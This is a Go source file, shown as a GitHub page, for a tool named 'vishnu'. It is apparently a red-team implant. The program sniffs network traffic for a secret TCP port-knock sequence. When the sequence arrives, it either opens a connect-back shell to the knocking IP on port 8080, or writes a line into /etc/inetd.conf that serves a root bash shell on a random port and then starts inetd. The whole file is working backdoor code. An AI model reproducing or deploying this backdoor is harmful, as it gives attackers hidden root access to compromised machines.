-
Notifications
You must be signed in to change notification settings - Fork 7
/
main.go
150 lines (126 loc) · 3.57 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
package main
import (
"errors"
"fmt"
"log"
"math/rand"
"os"
"os/exec"
"runtime"
"strconv"
"github.com/emmaunel/vishnu/spec"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
)
type targetInfo struct {
os string
iFace string
snaplen int32
// vishnu uses tcp port knocking
filter string
// ports in order to port knock on
secretPorts []int
// how far into the sequence we are
// when secretCounter == len(secretPorts),
// port knocking is complete and shell is given
secretCounter int
lastPort layers.TCPPort
connectback bool
connectbackPort string
}
// create target info struct
func sInit(os string) *targetInfo {
tInfo := targetInfo{}
tInfo.os = os
tInfo.iFace = spec.GetAdapter()
tInfo.snaplen = int32(1600)
tInfo.filter = "tcp"
tInfo.secretPorts = []int{1, 2, 3, 4}
tInfo.secretCounter = 0
// if true, connect back to knocking
// IP on connectbackPort
tInfo.connectback = false
// only relevant if connectback is true
tInfo.connectbackPort = "8080"
return &tInfo
}
func main() {
tInfo := sInit(runtime.GOOS)
// Read package and analze them
handle, err := pcap.OpenLive(tInfo.iFace, tInfo.snaplen, true, pcap.BlockForever)
errorPrinter(err)
handle.SetBPFFilter(tInfo.filter)
packets := gopacket.NewPacketSource(handle, handle.LinkType()).Packets()
for pkt := range packets {
// Your analysis here! Get the important stuff
printPacketInfo(pkt, tInfo)
}
}
func vishnu(ip string, tInfo *targetInfo) {
if tInfo.connectback || tInfo.os == "windows" {
spec.ConnectBack(ip, tInfo.connectbackPort)
} else {
randomPort := rand.Intn(65535-100) + 100
// println("The doors are open on port ", strconv.Itoa(randomPort))
// Append to a file /etc/inetd.conf
fd, err := os.OpenFile("/etc/inetd.conf", os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600)
errorPrinter(err)
defer fd.Close()
if _, err = fd.WriteString(strconv.Itoa(randomPort) + " stream tcp nowait root /bin/bash bash\n"); err != nil {
log.Panicln(err)
}
exec.Command("/usr/sbin/inetd").Run()
}
}
func grabRemoteIP(packet gopacket.Packet) (string, error) {
iplayer := packet.Layer(layers.LayerTypeIPv4)
if iplayer == nil {
return "", errors.New("Packet is not IPv4")
}
ip, _ := iplayer.(*layers.IPv4)
return ip.SrcIP.String(), nil
}
func printPacketInfo(packet gopacket.Packet, tInfo *targetInfo) {
// Let's see if the packet is TCP
tcpLayer := packet.Layer(layers.LayerTypeTCP)
if tcpLayer != nil {
tcp, _ := tcpLayer.(*layers.TCP)
// Check the TCP Flag
if tcp.SYN {
// fmt.Printf("From port %d to %d\n", tcp.SrcPort, tcp.DstPort)
// Check dst port for secret port
tInfo.lastPort = tcp.DstPort
if tcp.DstPort == layers.TCPPort(tInfo.secretPorts[tInfo.secretCounter]) {
tInfo.secretCounter++
tInfo.lastPort = tcp.DstPort
} else if tInfo.secretCounter != 0 && tInfo.lastPort == layers.TCPPort(tInfo.secretPorts[tInfo.secretCounter-1]) { // fixed TCP 2x duplication issue
fmt.Println("duplicate tcp") // pass
} else {
// reset counter
tInfo.secretCounter = 0
}
}
}
if tInfo.secretCounter == len(tInfo.secretPorts) {
tInfo.secretCounter = 0
// grab IP address
ip, err := grabRemoteIP(packet)
// TODO maybe just listen if connectback is
// on and we can't get the remote IP
if tInfo.connectback && err != nil {
return
}
// open the gateway
go vishnu(ip, tInfo)
}
// Check for errors
if err := packet.ErrorLayer(); err != nil {
fmt.Println("Error decoding some part of the packet:", err)
}
}
func errorPrinter(err error) {
if err != nil {
log.Panicln(err)
}
}